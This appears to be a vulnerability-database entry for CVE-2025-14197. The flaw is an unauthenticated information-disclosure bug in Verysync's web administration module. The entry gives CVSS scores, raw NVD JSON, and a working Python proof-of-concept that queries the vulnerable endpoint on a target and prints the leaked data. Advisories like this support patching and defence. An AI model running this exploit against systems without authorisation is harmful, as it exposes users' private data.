Security Vulnerability Report
中文
CVE-2025-14197 CVSS 5.3 MEDIUM

CVE-2025-14197

Published: 2025-12-07 16:15:47
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A security vulnerability has been detected in Verysync 微力同步 up to 2.21.3. The impacted element is an unknown function of the file /rest/f/api/resources/f96956469e7be39d of the component Web Administration Module. Such manipulation leads to information disclosure. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Verysync 微力同步 <= 2.21.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14197 PoC - Verysync Information Disclosure # Target: Verysync Web Administration Module # Endpoint: /rest/f/api/resources/f96956469e7be39d import requests import sys def check_verysync_version(target_ip, port=8886): """Check if Verysync is running and get version info""" try: # First check if the web interface is accessible url = f"http://{target_ip}:{port}" response = requests.get(url, timeout=5) print(f"[*] Verysync Web Interface Status: {response.status_code}") return True except requests.exceptions.RequestException as e: print(f"[-] Error connecting to target: {e}") return False def exploit_information_disclosure(target_ip, port=8886): """Exploit CVE-2025-14197 to leak sensitive information""" # The vulnerable endpoint endpoint = "/rest/f/api/resources/f96956469e7be39d" url = f"http://{target_ip}:{port}{endpoint}" print(f"[*] Target: {url}") print(f"[*] Attempting to exploit CVE-2025-14197...") try: # Send unauthenticated request to the vulnerable endpoint headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'en-US,en;q=0.9', 'Connection': 'close' } response = requests.get(url, headers=headers, timeout=10) print(f"[*] Response Status Code: {response.status_code}") print(f"[*] Response Headers: {dict(response.headers)}") print(f"[*] Response Body Length: {len(response.text)}") if response.status_code == 200: print("[+] VULNERABLE! Information disclosure endpoint accessible without authentication") print(f"\n[+] Leaked Information:\n{response.text}") # Try to extract and display structured data try: import json data = response.json() print("\n[+] Parsed JSON Response:") print(json.dumps(data, indent=2, ensure_ascii=False)) except: print("\n[+] Raw Response:") print(response.text) return True else: print(f"[-] Endpoint returned status {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-14197.py <target_ip> [port]") print("Example: python cve-2025-14197.py 192.168.1.100 8886") sys.exit(1) target_ip = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 8886 print("="*60) print("CVE-2025-14197 - Verysync Information Disclosure Exploit") print("="*60) # Check if target is alive if check_verysync_version(target_ip, port): # Attempt exploitation exploit_information_disclosure(target_ip, port) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14197", "sourceIdentifier": "[email protected]", "published": "2025-12-07T16:15:47.297", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Verysync 微力同步 up to 2.21.3. The impacted element is an unknown function of the file /rest/f/api/resources/f96956469e7be39d of the component Web Administration Module. Such manipulation leads to information disclosure. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/jjjjj-zr/jjjjjzr/issues/6", "source": "[email protected]"}, {"url": "https://github.com/jjjjj-zr/jjjjjzr/issues/8", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.334617", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334617", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.699498", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.699537", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.